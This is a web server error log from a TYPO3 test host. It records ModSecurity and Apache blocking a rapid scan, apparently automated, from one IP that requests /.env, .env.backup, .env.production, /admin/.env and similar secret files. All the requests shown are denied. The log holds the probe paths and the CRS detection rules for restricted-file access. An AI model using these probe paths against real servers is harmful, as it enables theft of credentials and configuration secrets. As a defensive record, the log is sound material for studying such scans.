[Sun Nov 16 12:38:50.887708 2025] [:error] [pid 111778] [client 3.8.102.89:51670] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aRm3yh7OFadbAiGPfqkqygAAAAI"]
[Sun Nov 16 12:38:50.887905 2025] [:error] [pid 111778] [client 3.8.102.89:51670] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aRm3yh7OFadbAiGPfqkqygAAAAI"]
[Sun Nov 16 12:38:50.888063 2025] [:error] [pid 111778] [client 3.8.102.89:51670] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aRm3yh7OFadbAiGPfqkqygAAAAI"]
[Sun Nov 16 12:38:50.937044 2025] [:error] [pid 107823] [client 3.8.102.89:51690] [client 3.8.102.89] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env.old"] [unique_id "aRm3ymZlvYqdbt58w-ZoQgAAABA"]
[Sun Nov 16 12:38:50.937200 2025] [:error] [pid 107823] [client 3.8.102.89:51690] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env.old"] [unique_id "aRm3ymZlvYqdbt58w-ZoQgAAABA"]
[Sun Nov 16 12:38:50.937393 2025] [:error] [pid 107823] [client 3.8.102.89:51690] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env.old"] [unique_id "aRm3ymZlvYqdbt58w-ZoQgAAABA"]
[Sun Nov 16 12:38:50.937551 2025] [:error] [pid 107823] [client 3.8.102.89:51690] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env.old"] [unique_id "aRm3ymZlvYqdbt58w-ZoQgAAABA"]
[Sun Nov 16 12:38:50.946124 2025] [authz_core:error] [pid 113276] [client 3.8.102.89:51754] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Sun Nov 16 12:38:50.952678 2025] [authz_core:error] [pid 107792] [client 3.8.102.89:51664] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/src
[Sun Nov 16 12:38:50.957584 2025] [authz_core:error] [pid 113296] [client 3.8.102.89:51728] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/app
[Sun Nov 16 12:38:50.974624 2025] [:error] [pid 107814] [client 3.8.102.89:51838] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/src/.env.save"] [unique_id "aRm3yoYUzNZoYnjqey4-9gAAAAc"]
[Sun Nov 16 12:38:50.974831 2025] [:error] [pid 107814] [client 3.8.102.89:51838] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/src/.env.save"] [unique_id "aRm3yoYUzNZoYnjqey4-9gAAAAc"]
[Sun Nov 16 12:38:50.974980 2025] [:error] [pid 107814] [client 3.8.102.89:51838] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/src/.env.save"] [unique_id "aRm3yoYUzNZoYnjqey4-9gAAAAc"]
[Sun Nov 16 12:38:50.990697 2025] [:error] [pid 113274] [client 3.8.102.89:51712] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aRm3yo4DuVT7Zp3PDSdxIwAAAAE"]
[Sun Nov 16 12:38:50.990897 2025] [:error] [pid 113274] [client 3.8.102.89:51712] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aRm3yo4DuVT7Zp3PDSdxIwAAAAE"]
[Sun Nov 16 12:38:50.991052 2025] [:error] [pid 113274] [client 3.8.102.89:51712] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aRm3yo4DuVT7Zp3PDSdxIwAAAAE"]
[Sun Nov 16 12:38:50.992440 2025] [:error] [pid 113290] [client 3.8.102.89:51772] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aRm3yn9I9DIP5OQurvpqkAAAAAQ"]
[Sun Nov 16 12:38:50.992628 2025] [:error] [pid 113290] [client 3.8.102.89:51772] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aRm3yn9I9DIP5OQurvpqkAAAAAQ"]
[Sun Nov 16 12:38:50.992776 2025] [:error] [pid 113290] [client 3.8.102.89:51772] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aRm3yn9I9DIP5OQurvpqkAAAAAQ"]
[Sun Nov 16 12:38:51.006489 2025] [:error] [pid 106377] [client 3.8.102.89:51640] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aRm3y81A9uIKv4_seqC0XwAAAA4"]
[Sun Nov 16 12:38:51.006637 2025] [:error] [pid 106377] [client 3.8.102.89:51640] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aRm3y81A9uIKv4_seqC0XwAAAA4"]
[Sun Nov 16 12:38:51.006782 2025] [:error] [pid 106377] [client 3.8.102.89:51640] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aRm3y81A9uIKv4_seqC0XwAAAA4"]
[Sun Nov 16 12:38:51.027807 2025] [:error] [pid 113276] [client 3.8.102.89:51794] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aRm3y7Xvaf1IcB4yJOvE_AAAAAU"]
[Sun Nov 16 12:38:51.027970 2025] [:error] [pid 113276] [client 3.8.102.89:51794] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aRm3y7Xvaf1IcB4yJOvE_AAAAAU"]
[Sun Nov 16 12:38:51.028121 2025] [:error] [pid 113276] [client 3.8.102.89:51794] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aRm3y7Xvaf1IcB4yJOvE_AAAAAU"]
[Sun Nov 16 12:38:51.074654 2025] [authz_core:error] [pid 111778] [client 3.8.102.89:51722] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/api
[Sun Nov 16 12:38:51.095986 2025] [authz_core:error] [pid 107792] [client 3.8.102.89:51842] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/public
[Sun Nov 16 12:38:51.097304 2025] [authz_core:error] [pid 107814] [client 3.8.102.89:51864] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.bak
[Sun Nov 16 12:38:51.119479 2025] [:error] [pid 113290] [client 3.8.102.89:51720] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.tmp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.tmp"] [unique_id "aRm3y39I9DIP5OQurvpqkQAAAAQ"]
[Sun Nov 16 12:38:51.119702 2025] [:error] [pid 113290] [client 3.8.102.89:51720] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.tmp"] [unique_id "aRm3y39I9DIP5OQurvpqkQAAAAQ"]
[Sun Nov 16 12:38:51.119870 2025] [:error] [pid 113290] [client 3.8.102.89:51720] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.tmp"] [unique_id "aRm3y39I9DIP5OQurvpqkQAAAAQ"]
[Sun Nov 16 12:38:51.121720 2025] [:error] [pid 113274] [client 3.8.102.89:51788] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env.save"] [unique_id "aRm3y44DuVT7Zp3PDSdxJAAAAAE"]
[Sun Nov 16 12:38:51.121931 2025] [:error] [pid 113274] [client 3.8.102.89:51788] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env.save"] [unique_id "aRm3y44DuVT7Zp3PDSdxJAAAAAE"]
[Sun Nov 16 12:38:51.122095 2025] [:error] [pid 113274] [client 3.8.102.89:51788] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env.save"] [unique_id "aRm3y44DuVT7Zp3PDSdxJAAAAAE"]
[Sun Nov 16 12:38:51.150838 2025] [:error] [pid 113276] [client 3.8.102.89:51856] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aRm3y7Xvaf1IcB4yJOvE_QAAAAU"]
[Sun Nov 16 12:38:51.151009 2025] [:error] [pid 113276] [client 3.8.102.89:51856] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aRm3y7Xvaf1IcB4yJOvE_QAAAAU"]
[Sun Nov 16 12:38:51.151179 2025] [:error] [pid 113276] [client 3.8.102.89:51856] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aRm3y7Xvaf1IcB4yJOvE_QAAAAU"]
[Sun Nov 16 12:38:51.175423 2025] [:error] [pid 113296] [client 3.8.102.89:51686] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/src/.env"] [unique_id "aRm3y_7nuvXY8JVEGWXCgAAAAA8"]
[Sun Nov 16 12:38:51.175615 2025] [:error] [pid 113296] [client 3.8.102.89:51686] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/src/.env"] [unique_id "aRm3y_7nuvXY8JVEGWXCgAAAAA8"]
[Sun Nov 16 12:38:51.175761 2025] [:error] [pid 113296] [client 3.8.102.89:51686] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/src/.env"] [unique_id "aRm3y_7nuvXY8JVEGWXCgAAAAA8"]
[Sun Nov 16 12:38:51.177967 2025] [:error] [pid 106377] [client 3.8.102.89:51766] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aRm3y81A9uIKv4_seqC0YAAAAA4"]
[Sun Nov 16 12:38:51.178118 2025] [:error] [pid 106377] [client 3.8.102.89:51766] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aRm3y81A9uIKv4_seqC0YAAAAA4"]
[Sun Nov 16 12:38:51.178251 2025] [:error] [pid 106377] [client 3.8.102.89:51766] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aRm3y81A9uIKv4_seqC0YAAAAA4"]
[Sun Nov 16 12:38:51.181754 2025] [:error] [pid 113283] [client 3.8.102.89:51824] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aRm3yw0D7yRPJp9gclT4hgAAAAM"]
